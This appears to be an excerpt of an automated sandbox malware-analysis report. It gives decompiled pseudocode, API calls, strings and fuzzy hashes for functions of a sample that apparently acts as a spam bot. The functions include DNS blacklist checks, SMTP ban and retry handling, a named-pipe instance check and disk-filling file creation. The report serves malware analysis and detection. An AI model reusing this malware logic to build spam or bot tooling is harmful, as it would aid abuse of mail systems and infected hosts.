					 *0x4122e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x4122dc > 0xdbba0) {
					_t53 =  *0x412000; // 0x410288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x412000;
						do {
							if(E00402EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
								if(E00401978(_t56, 0x19) != 0) {
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
									__eflags =  *_t18;
								} else {
									goto L20;
								}
							}
							goto L23;
							L20:
							_t102 = _t102 + 1;
							_t55 = 0x412000 + _t102 * 4;
						} while ( *((char*)( *(0x412000 + _t102 * 4))) != 0);
					}
					L23:
					 *0x4122dc = GetTickCount();
				}
				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x412110;
				_t45 = E0040F04E(0) -  *0x4122f0;
				_t93 = "localcfg";
				_t122 = _t45 -  *0x4122e4; // 0x0
				if(_t122 > 0) {
					E0040E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x410264);
					_t51 = E0040E819(1, _t93, "rbl_ip", 0);
					_t104 = _t104 + 0x28;
					if(_t51 == 0) {
						L28:
						 *0x4122e4 = 0x12c;
					} else {
						_t124 =  *((intOrPtr*)(_t104 + 0x10));
						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
							goto L28;
						} else {
							_push(_t104 + 0x10);
							_push(_t51);
							 *((intOrPtr*)(_t96 + 0x38)) = E00401C5F(_t124);
							 *0x4122e4 = 0x4b0;
						}
					}
				}
				_t47 = E0040F04E(0) -  *0x4122f0;
				if(_t47 > 0x4b0) {
					E0040EA84(1, _t93, "net_type",  *(_t96 + 0x14));
					_t47 = E0040F04E(0);
					 *0x4122f0 = _t47;
				}
				return _t47;
			}

APIs

GetTickCount.KERNEL32 ref: 00402078
GetTickCount.KERNEL32 ref: 004020D4
GetTickCount.KERNEL32 ref: 004020DB
GetTickCount.KERNEL32 ref: 0040212B
GetTickCount.KERNEL32 ref: 00402132
GetTickCount.KERNEL32 ref: 00402142

Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,73AFF210,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4), ref: 0040F089
Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,73AFF210,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0040F093

Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899

Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1

Strings

rbl_ip, xrefs: 0040218F
localcfg, xrefs: 00402070, 00402160, 00402186, 00402194, 004021E4
net_type, xrefs: 004021DF
rbl_bl, xrefs: 00402181

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
String ID: localcfg$net_type$rbl_bl$rbl_ip
API String ID: 3976553417-1522128867
Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040405E, Relevance: 16.7, APIs: 11, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040405E(void* __ecx) {
				unsigned int _v8;
				unsigned int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				void* _t40;
				void* _t43;
				void* _t49;
				void* _t56;
				void* _t62;
				void* _t64;
				long _t71;
				void* _t82;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t104;

				_t95 = __ecx;
				_v8 = 0;
				_t40 = CreateEventA(0, 1, 1, 0);
				_v16 = _t40;
				if(_t40 != 0) {
					_t43 = E00404000(E00403ECD(_t95),  &_v20);
					_t97 = _t98;
					_t102 = 0x7d0;
					_t92 = 0x100;
					_t99 = 0x4122f8;
					if(_t43 == 0) {
						L10:
						E0040EE2A(_t97, _t99, 0, _t92);
						_t104 = _t103 + 0xc;
						_t93 = 0xa;
						while(1) {
							_t93 = _t93 - 1;
							_t99 = CreateNamedPipeA(E00403ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0);
							if(_t99 != 0xffffffff) {
								break;
							}
							Sleep(0x1f4);
							if(_t93 != 0) {
								continue;
							}
							CloseHandle(_v16);
							return 0;
						}
						L14:
						while(1) {
							do {
								L14:
								while(1) {
									do {
										if(ConnectNamedPipe(_t99, 0) != 0) {
											goto L16;
										}
										_t71 = GetLastError();
										asm("sbb eax, eax");
										if( ~(_t71 - 0x217) + 1 == 0) {
											L25:
											DisconnectNamedPipe(_t99);
											continue;
										}
										L16:
										_t49 = E00403F8C(_t99,  &_v12, 4, _v16, _t102);
										_t104 = _t104 + 0x14;
									} while (_t49 == 0);
									_t92 = _v16;
									_v8 = (_v12 >> 2) + _v12;
									E00403F18(_t99,  &_v8, 4, _t92, _t102);
									_t56 = E00403F8C(_t99,  &_v12, 4, _t92, _t102);
									_t104 = _t104 + 0x28;
									if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
										goto L25;
									} else {
										_t62 = E00403F8C(_t99,  &_v28, 8, _t92, _t102);
										_t104 = _t104 + 0x14;
										if(_t62 == 0 || _v24 != 0xc) {
											goto L25;
										} else {
											_t64 = E00403F8C(_t99,  &_v40, 0xc, _t92, _t102);
											_t104 = _t104 + 0x14;
											if(_t64 == 0) {
												goto L25;
											}
											break;
										}
									}
								}
							} while (_v28 != 1);
							E00403F18(_t99,  &_v8, 4, _t92, _t102);
							_t103 = _t104 + 0x14;
							if(_v32 == 0) {
								_t102 = CloseHandle;
								CloseHandle(_t99);
								CloseHandle(_t92);
								E0040E318();
								L8:
								ExitProcess(0);
							}
							 *0x41215a =  *0x41215a + 1;
						}
					}
					E0040EE2A(_t97, 0x4122f8, 0, 0x100);
					_t103 = _t103 + 0xc;
					if(_v20 == 0xffffffff) {
						goto L10;
					}
					_v12 = E0040ECA5();
					E00403F18(_v20,  &_v12, 4, _v16, 0x7d0);
					_t82 = E00403F8C(_v20,  &_v8, 4, _v16, 0x7d0);
					_t103 = _t103 + 0x28;
					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
						CloseHandle(_v20);
						goto L10;
					} else {
						_v8 = _v8 + (_v8 >> 2);
						E00403F18(_v20,  &_v8, 4, _v16, 0x7d0);
						_t103 = _t103 + 0x14;
						goto L8;
					}
				}
				return 0;
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
ExitProcess.KERNEL32 ref: 00404121

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CreateEventExitProcess
String ID:
API String ID: 2404124870-0
Opcode ID: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
Opcode Fuzzy Hash: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2DC, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 182
threadCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040C2DC(void* __ebp, signed int _a4) {
				void* _t86;
				signed int _t90;
				signed int _t91;
				long _t93;
				signed int _t95;
				signed int _t101;
				signed int _t108;
				signed int _t112;
				signed int _t115;
				long _t117;
				long _t118;
				signed int _t120;
				struct _SECURITY_ATTRIBUTES* _t122;
				signed int _t123;
				signed int _t132;
				signed int _t148;
				signed char _t151;
				signed int _t154;
				signed int _t156;
				signed char* _t157;
				void* _t158;
				signed int _t163;

				_t158 = __ebp;
				_t157 = _a4;
				E0040A4C7(_t157);
				_t122 = 0;
				if(_t157[0x44] == 0) {
					_t157[8] = 0;
					_t157[0x34] = 0;
					_t157[0x38] = 0;
					_t157[0x3c] = 0;
					_t157[0x54] = 0;
					_t157[0x40] = 0;
					_t157[0x58] = 0;
					L31:
					_t82 =  &(_t157[4]); // 0x40c4e4
					_t86 = _t82;
					_t148 =  !( *_t157) & 0x00000001;
					_t157[0x5c] = _t122;
					_t84 =  &(_t157[8]); // 0xfffffdf0
					if( *_t86 >=  *_t84) {
						L34:
						return _t86;
					}
					_t86 = CreateThread(_t122, _t122, E0040B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
					if(_t86 == _t122) {
						goto L34;
					}
					return CloseHandle(_t86);
				}
				if(_t157[8] != 0) {
					__eflags = _t157[0x48];
					if(_t157[0x48] == 0) {
						L5:
						_t12 =  &(_t157[0x10]); // 0x59be026a
						_t90 =  *_t12;
						_t157[8] = _t90;
						_t157[0x34] = _t90;
						_t91 = _t90 * 0x3e8;
						__eflags = _t91;
						_t157[0x38] = _t122;
						_t157[0x3c] = _t122;
						_t157[0x1c] = _t90 * 0x2710;
						_t157[0x20] = _t91;
						goto L6;
					}
					_t118 = GetTickCount();
					_t11 =  &(_t157[0x48]); // 0x13740041
					__eflags = _t118 -  *_t11 - 0x927c0;
					if(_t118 -  *_t11 < 0x927c0) {
						goto L6;
					}
					goto L5;
				} else {
					_t4 =  &(_t157[0xc]); // 0x5756c359
					_t120 =  *_t4;
					_t157[0x1c] = _t120 * 0x2710;
					_t157[8] = _t120;
					_t157[0x20] = _t120 * 0x3e8;
					_t157[0x34] = _t120;
					_t157[0x48] = GetTickCount();
					L6:
					if(( *_t157 & 0x00000001) == 0) {
						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
						_t157[8] =  *_t73;
						goto L31;
					}
					_t93 = GetTickCount();
					_t21 =  &(_t157[0x4c]); // 0x26fce850
					if(_t93 -  *_t21 >= 0x2710) {
						goto L31;
					}
					if(_t157[0x54] == _t122) {
						_t95 = 0x3e8;
					} else {
						_t117 = GetTickCount();
						_t23 =  &(_t157[0x54]); // 0x41366c1d
						_t95 = _t117 -  *_t23;
					}
					_t123 = _t95;
					if(_t95 < 1) {
						_t123 = 1;
					}
					if(_t123 > 0x4e20) {
						_t123 = 0x4e20;
					}
					_t24 =  &(_t157[0x58]); // 0x701d8900
					_t25 =  &(_t157[0x40]); // 0x74c33b57
					_t151 =  *_t25;
					_t132 =  *_t24 * 0x3e8;
					_push(_t158);
					asm("cdq");
					_push(0x14);
					_a4 = _t123;
					asm("cdq");
					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
					if(_t101 == 0) {
						__eflags = _t132 - _t151;
						if(__eflags == 0) {
							goto L22;
						}
						if(__eflags >= 0) {
							_t156 = _t151 + 1;
							__eflags = _t156;
						} else {
							_t156 = _t151 - 1;
						}
						goto L21;
					} else {
						_t156 = _t151 + _t101;
						L21:
						_t157[0x40] = _t156;
						L22:
						if(_t157[0x40] < 0) {
							_t157[0x40] = _t157[0x40] & 0x00000000;
						}
						_t39 =  &(_t157[0x40]); // 0x74c33b57
						_t163 = (0xc8 -  *_t39) * 0x14;
						if(_t123 > 0x3e8) {
							_a4 = 0x3e8;
						}
						asm("cdq");
						_t46 =  &(_t157[0x14]); // 0x5f004120
						_t47 =  &(_t157[0x10]); // 0x59be026a
						asm("cdq");
						_t49 =  &(_t157[0x30]); // 0xe4754f45
						_t54 =  &(_t157[0x20]); // 0x406a0000
						_t108 = E0040A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t56 =  &(_t157[0x2c]); // 0xc68314c4
						_t157[0x20] = _t108;
						_t112 = E0040A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t122 = 0;
						_t157[0x58] = 0;
						_t154 = _t112 / 0x3e8;
						_t157[0x54] = GetTickCount();
						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
						_t115 =  *_t68;
						if(_t115 <= _t154) {
							_t157[8] = _t115;
							_t157[0x20] = _t115 * 0x3e8;
						} else {
							_t157[8] = _t154;
							_t157[0x1c] = _t154 * 0x2710;
						}
						goto L31;
					}
				}
			}

APIs

Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA

GetTickCount.KERNEL32 ref: 0040C31F
GetTickCount.KERNEL32 ref: 0040C32B
GetTickCount.KERNEL32 ref: 0040C363
GetTickCount.KERNEL32 ref: 0040C378
GetTickCount.KERNEL32 ref: 0040C44D
InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0040C4E0), ref: 0040C4C1
CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC

Strings

localcfg, xrefs: 0040C2DD

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
String ID: localcfg
API String ID: 1553760989-1857712256
Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14

Uniqueness

Uniqueness Score: -1.00%

Function 0047F565, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(0047CC6D), ref: 0047F59D
socket.WS2_32(00000002,00000001,00000000), ref: 0047F5B7
closesocket.WS2_32(00000000), ref: 0047F5C5

Strings

^s, xrefs: 0047F619
ps, xrefs: 0047F5C5, 0047F5F0
time_cfg, xrefs: 0047F573

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: closesockethtonssocket
String ID: ps$time_cfg$^s
API String ID: 311057483-2063425486
Opcode ID: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
Instruction ID: f67b9b241d501d8055d704de529da87137f43f2fc818fd16b090273ed2278e52
Opcode Fuzzy Hash: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
Instruction Fuzzy Hash: EC317C72900118BBDB109FA5DC89DEF7BBCEF89314F108166F919D3150E7748A868BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00473042, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97memorylibrarynetworkCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 00473051
LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00473061
GetProcAddress.KERNEL32(00000000,00410408), ref: 0047307E
RtlAllocateHeap.NTDLL(00000000), ref: 0047309F
htons.WS2_32(00000035), ref: 004730D8
inet_addr.WS2_32(?), ref: 004730E3
gethostbyname.WS2_32(?), ref: 004730F6
HeapFree.KERNEL32(00000000), ref: 00473136

Strings

iphlpapi.dll, xrefs: 0047304B, 00473050, 00473060

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
String ID: iphlpapi.dll
API String ID: 2869546040-3565520932
Opcode ID: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
Instruction ID: 1c3325a99e92b3460e0b661e7f492b812815b0e1b79cd7daab0477821cd5e404
Opcode Fuzzy Hash: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
Instruction Fuzzy Hash: 4E317531A00605ABDB119F749D48ADF7BB8EF04762F24C126E518E7290D778DA41979C

Uniqueness

Uniqueness Score: -1.00%

Function 00479576, Relevance: 15.3, APIs: 10, Instructions: 284registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?), ref: 00479590
GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 004795BE
GetModuleFileNameA.KERNEL32(00000000), ref: 004795C5
wsprintfA.USER32 ref: 0047961E
wsprintfA.USER32 ref: 0047965C
wsprintfA.USER32 ref: 004796DD
RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 00479741
RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00479776
RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 004797C1

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
String ID:
API String ID: 3696105349-0
Opcode ID: 0d65d5301a6a49fceabf2f95fb7146ab38e3d88028f93bcd31063ea55defb5ef
Instruction ID: 53b5c77cc619f00715ffe3773795c6027afdabbe979d38604037bfb043a4e917
Opcode Fuzzy Hash: 0d65d5301a6a49fceabf2f95fb7146ab38e3d88028f93bcd31063ea55defb5ef
Instruction Fuzzy Hash: 59A162B1910218EFEB25DF91CC45FDE3BACEB05344F108027FA09D6251E7B9D9848BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402D21, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85
memorylibrarystringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00402D21(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				char _v28;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				long* _t30;
				intOrPtr* _t37;
				long _t39;
				long _t40;
				void* _t41;

				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t19 = GetModuleHandleA( &_v28);
				_t39 = 0;
				if(_t19 != 0) {
					L3:
					_t20 = GetProcAddress(_t19, "DnsQuery_A");
					if(_t20 == _t39) {
						L2:
						return 0;
					}
					_push(_t39);
					_t35 =  &_v16;
					_push( &_v16);
					_push(_t39);
					_push(_t39);
					_push(0xf);
					_push(_a4);
					if( *_t20() != 0) {
						goto L2;
					}
					_t37 = _v16;
					_v8 = _t39;
					_v12 = _t39;
					if(_t37 == _t39) {
						L14:
						return _v12;
					}
					do {
						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
						if(_t40 == 0) {
							break;
						}
						E0040EE2A(_t35, _t40, 0, 0x108);
						_t41 = _t41 + 0xc;
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40;
						} else {
							_v12 = _t40;
						}
						L12:
						_t37 =  *_t37;
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				_t19 = LoadLibraryA( &_v28);
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}

APIs

GetModuleHandleA.KERNEL32(00000000,73BCEA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
LoadLibraryA.KERNEL32(?), ref: 00402D4A
GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
HeapAlloc.KERNEL32(00000000), ref: 00402DA0
lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB

Strings

dnsapi.dll, xrefs: 00402D29
DnsQuery_A, xrefs: 00402D5B

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
String ID: DnsQuery_A$dnsapi.dll
API String ID: 3560063639-3847274415
Opcode ID: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
Opcode Fuzzy Hash: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE31, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 152
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040BE31(signed int _a4, intOrPtr _a8) {
				signed int _v8;
				CHAR* _v12;
				int _v16;
				int _t50;
				int _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				char* _t66;
				CHAR* _t68;
				int _t71;
				int _t72;
				void* _t76;
				intOrPtr _t78;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;
				void* _t91;
				void* _t92;

				_t83 = _a4;
				_t68 = _t83 + 4;
				_v12 = _t68;
				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
					L3:
					_t72 = 0;
					_v16 = 0;
					if(_a8 == 3) {
						L25:
						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
								_t50 = lstrcmpiA(_v12, "smtp_retr");
								_t51 = 0x413638;
								if(_t50 != 0) {
									_t51 = _a4;
								}
							} else {
								_t51 = 0x413634;
							}
						} else {
							_t51 = 0x413630;
						}
						_t86 =  *_t51;
						 *_t51 = _v16;
						if(_t86 == 0) {
							goto L36;
						} else {
							_t52 =  *_t86;
							_t84 = 0;
							while(_t52 != 0) {
								E0040EC2E(_t52);
								_t84 = _t84 + 1;
								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
							}
							return E0040EC2E(_t86);
						}
					}
					_t55 =  *((intOrPtr*)(_t83 + 0x18));
					_t82 = 0;
					if(_t55 <= 0) {
						goto L25;
					} else {
						goto L5;
					}
					do {
						L5:
						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
							_t82 = _t82 + 1;
						}
						_t72 = _t72 + 1;
					} while (_t72 < _t55);
					if(_t82 == 0) {
						goto L25;
					}
					_t70 = 4 + _t82 * 4;
					_t51 = E0040EBCC(4 + _t82 * 4);
					_pop(_t76);
					_v16 = _t51;
					if(_t51 == 0) {
						goto L36;
					}
					E0040EE2A(_t76, _t51, 0, _t70);
					_t57 =  *((intOrPtr*)(_t83 + 0x18));
					_v8 = _v8 & 0x00000000;
					_a4 = _a4 & 0x00000000;
					_t92 = _t91 + 0xc;
					if(_t57 > 0) {
						_t71 = _v16;
						do {
							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
							if(_t78 == 0xa || _a4 == _t57 - 1) {
								_t88 = _a4 - _v8;
								if(_t78 != 0xa) {
									_t88 = _t88 + 1;
								}
								_t25 = _t88 + 1; // 0x1
								_t59 = E0040EBCC(_t25);
								 *_t71 = _t59;
								if(_t59 == 0) {
									goto L25;
								} else {
									E0040EE08(_t59, _t83 + _v8 + 0x24, _t88);
									_t92 = _t92 + 0xc;
									 *((char*)(_t88 +  *_t71)) = 0;
									if(_t88 > 0) {
										_t31 =  *_t71 - 1; // -1
										_t66 = _t88 + _t31;
										if( *_t66 == 0xd) {
											 *_t66 = 0;
										}
									}
									_t71 = _t71 + 4;
									_v8 = _v8 + _t88 + 1;
									goto L22;
								}
							}
							L22:
							_a4 = _a4 + 1;
							_t57 =  *((intOrPtr*)(_t83 + 0x18));
						} while (_a4 < _t57);
					}
					goto L25;
				} else {
					_t51 = lstrcmpiA(_t68, "smtp_retr");
					if(_t51 != 0) {
						L36:
						return _t51;
					}
					goto L3;
				}
			}

APIs

lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94

Strings

smtp_retr, xrefs: 0040BE61, 0040BF8C
smtp_herr, xrefs: 0040BE46, 0040BF62
smtp_ban, xrefs: 0040BE55, 0040BF77

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: smtp_ban$smtp_herr$smtp_retr
API String ID: 1586166983-1625972887
Opcode ID: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
Opcode Fuzzy Hash: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC

Uniqueness

Uniqueness Score: -1.00%

Function 00406A60, Relevance: 13.6, APIs: 9, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				intOrPtr _t43;
				int _t44;
				void* _t53;
				int _t59;
				CHAR* _t68;
				void* _t69;
				int _t73;

				_t59 = __edx;
				_t68 = _a4;
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0);
				_v12 = _t31;
				if(_t31 == 0xffffffff) {
					 *0x412180 = 0x61080101;
					 *0x41217c = GetLastError();
					__eflags = 0;
					return 0;
				}
				_v8 =  *_t68;
				_v7 = _t68[1];
				_t63 = _a12;
				_v6 = _t68[2];
				_v5 = 0;
				if(GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32) == 0) {
					L10:
					_t43 = E00406987(0x500000, _v12, _a8, _a12, _t63);
					_v28 = _t43;
					if(_t43 != 0) {
						_t44 = CloseHandle(_v12);
						__eflags = _t44;
						if(_t44 != 0) {
							L15:
							return _v28;
						}
						 *0x412180 = 0x61080103;
						 *0x41217c = GetLastError();
						CloseHandle(_v12);
						L14:
						DeleteFileA(_t68);
						goto L15;
					}
					 *0x412180 = 0x61080102;
					 *0x41217c = GetLastError();
					CloseHandle(_v12);
					goto L14;
				}
				_t53 = E0040EB0E(_v20 * _v24, 0, _v16, 0);
				_t69 = _t69 + 0x10;
				_t73 = _t59;
				if(_t73 < 0) {
					goto L10;
				}
				if(_t73 > 0 || _t53 > 0x6400000) {
					_t22 = E0040ECA5() % 0x500000 + 0xa00000; // 0xa00000
					_t63 = _t22;
					goto L10;
				} else {
					__eflags = _t59;
					if(__eflags < 0) {
						goto L10;
					}
					if(__eflags > 0) {
						L9:
						_t63 = (E0040ECA5() & 0x001fffff) + 0x300000;
						__eflags = (E0040ECA5() & 0x001fffff) + 0x300000;
						goto L10;
					}
					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) {
						goto L10;
					}
					goto L9;
				}
			}

0x00406a60
0x00406a68
0x00406a7d
0x00406a83
0x00406a89
0x00406b8c
0x00406b9c
0x00406ba1
0x00000000
0x00406ba1
0x00406a91
0x00406a97
0x00406a9e
0x00406aa1
0x00406ab8
0x00406ac3
